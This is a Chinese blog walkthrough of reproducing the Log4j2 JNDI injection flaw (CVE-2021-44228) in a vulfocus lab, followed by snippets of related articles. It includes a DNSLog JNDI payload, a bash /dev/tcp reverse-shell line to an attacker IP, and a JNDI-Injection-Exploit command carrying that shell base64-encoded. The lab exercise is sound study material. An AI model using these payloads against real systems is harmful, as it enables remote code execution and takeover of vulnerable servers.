代码编织梦想

目录

一、搭建vulfocus靶场

拉取vulfocus靶场镜像

运行vulfocus靶场

二、漏洞复现

1、DNSLog验证

 2、JNDI注入反弹shell

反弹shell指令:

JNDI启动方法:


一、搭建vulfocus靶场

前提:需要安装docker环境

以centos7为例

拉取vulfocus靶场镜像

docker pull vulfocus/vulfocus:latest
//拉取vulfocus靶场镜像

如果这里无法拉取镜像,重启一下docker服务即可

systemctl restart docker 

运行vulfocus靶场

docker create -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=xxx.xxx.xxx.xxx vulfocus/vulfocus
//ip为自己虚拟机的ip

 进行这步的时候出现了两个报错:iPv4转发禁用,不可联网;端口被占用

解决方法:

#配置转发,在最下面添加
net.ipv4.ip_forward=1

#重启服务,让配置生效
systemctl restart network

#查看是否成功,如果返回为“net.ipv4.ip_forward = 1”则表示成功
sysctl net.ipv4.ip_forward

解决办法:
docker -ps   //查看docker正在运行的进程
//杀死占用端口的进程镜像
docker kill [进程号]

成功后,在浏览器中输入ip地址,会出现下面的页面。

用户名密码默认:admin admin

 登录后就可以在镜像管理中下载所需镜像了

 因为我的靶场里没有log4j2漏洞的镜像,于是回docker拉了一个

docker pull vulfocus/log4j2-cve-2021-44228

 附漏洞镜像拉取命令链接:https://fofapro.github.io/vulfocus/#/images/README

添加完镜像后,就可以回首页选择自己想开的靶场了


二、漏洞复现

1、DNSLog验证

http://www.dnslog.cn/

将dnslog中获得的域名,构造payload:${jndi:ldap://qg3t7i.dnslog.cn}

使用Burpsuite抓包,在浏览器中点击,替换payload参数。

直接发包会报400错误,我们需要对它进行编码并重新发包

发包返回200 成功后,DNSlog网站中会接收到解析记录,说明这里有洞


2、JNDI注入反弹shell

利用JNDI注入工具在攻击机上开启JNDI服务器,我在kali安装

JNDI下载地址:Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit · GitHub

下载好之后拖到kali机里就可以了

反弹shell指令:

bash -i >& /dev/tcp/192.168.137.137/7777 0>&1

第一处标色处是服务器IP;第二处是自己设置的监听端口号(必须是未被占用的端口号)

JNDI启动方法:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"  -A  xxx.xxx.xxx.xxx

标颜色的地方是反弹shell指令经过base64编码后所得。这串代码里只需改此处和最后面服务器的IP

-C是执行的bash命令,-c参数后面是执行的具体命令,用双引号引起来 -A 指服务器的IP

 将反弹shell指令base64编码后,将一整串启动JNDI代码在kali中运行

设置端口号并监听,我这里设置的是7777

执行命令之后,生成可用payload

使用burpsuit抓包,替换payload

按照之前的方法,将payload进行url编码并发包(我使用第一个监听不到,第二个包监听到了)

监听界面出现如下所示,即为反弹shell成功

 提交flag

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55843787/article/details/124707658

Apache Log4j2代码执行漏洞复现(cve-2021-44228)-爱代码爱编程

目录 一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 l

log4j2-rce 靶场复现-爱代码爱编程

log4j2是前几天一个核弹级的漏洞 现在公开的靶场有vulfocus、bugkuhttp://vulfocus.fofa.so/#/dashboardhttps://ctf.bugku.com/challenges/detail/id/340.html 关于该漏洞原理有很多大佬写了, 久不做赘述。简单来说 日志打印时遇到了${, 如果里面包含内容会当

[漏洞复现]log4j漏洞RCE(CVE-2021-44228)-爱代码爱编程

文章源自于个人博客:http://vfree.ltd/ 前言 2021/12/09,阿里云安全团队向apache报告了由log4j日志引起的远程代码执行,12月10日,当天白帽跟提前过大年似的,疯狂刷src(利用超级简单),让部分src平台暂时停止收类似该漏洞,凌晨,很多程序员和安全员被迫起来应急响应,几乎市面上的大厂都受到了该漏洞的影

vulfocus Apache log4j2-RCE 漏洞复现(CVE-2021-44228)-爱代码爱编程

根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证 创建靶场后是这样一个页面。 使用payload验证,发现可以触发dnslog,可以确认可以利用 证明存在JNDI注入漏洞。 在这里我们需要用到JNDI-Injection-Exploit-1.0-SN

Log4J2 靶场漏洞复现-爱代码爱编程

北京时间12月9号深夜,Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228。相关地址NVD

log4j2漏洞复现(CVE-2021-44228)-爱代码爱编程

目录 漏洞简介:影响版本:复现环境1:复现环境2:复现环境3:复现环境4:安全建议: 漏洞简介: log4j是Apache公司的一款JAVA日志框架,基本上只要是java的框架都会用到这个log4j框架,所以上周不管是不是IT圈的都几乎被刷屏了,可见这个洞的危害之大,波及范围之广。所以复现一下。 影响版本: Apache Log4j 2.

vulfocus-fofa靶场 Log4j2远程命令执行-爱代码爱编程

Log4j2远程命令执行 前言一、Apache Log4j2是什么?二、复现步骤1.工具2.复现过程 前言 一、Apache Log4j2是什么? Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,

vulfocus-fofa靶场 Log4j2远程命令执行复现-爱代码爱编程

Log4j2远程命令执行复现 文章目录 Log4j2远程命令执行复现前言一、Apache Log4j2漏洞描述二、复现环境01.工具02.漏洞验证过程03.反弹shell总结 前言 一、Apache Log4j2漏洞描述 描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大

log4j2-rce漏洞复现(CVE-2021-44228)-爱代码爱编程

漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1) 漏洞编号:CVE-2021-44228 漏洞复现 利用vulfocus搭

Apache Log4j2 远程代码执行漏洞复现-爱代码爱编程

靶场: Vulfocus 靶场环境 目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试:http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c 也可通过 docker pull vulfocus/log4j2-rce-

【Vulfocus漏洞复现】log4j2-cve-2021-44228-爱代码爱编程

vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:64936/ 访问靶场环境http://123.58.236.76:64936/ 点击??? burp抓包,DNSlog验证漏洞是否存在 构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回

Log4j复现(vulfocus靶场详细教程)-爱代码爱编程

简介 2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用 ${} 关键标识符触发 JNDI 注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 复现 直接在vulfocus起一个靶场环境 burp抓包,看到提示参数是payload

用vulfocus靶场环境复现log4j2远程命令执行漏洞_vulfocus拉去log4j漏洞-爱代码爱编程

声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。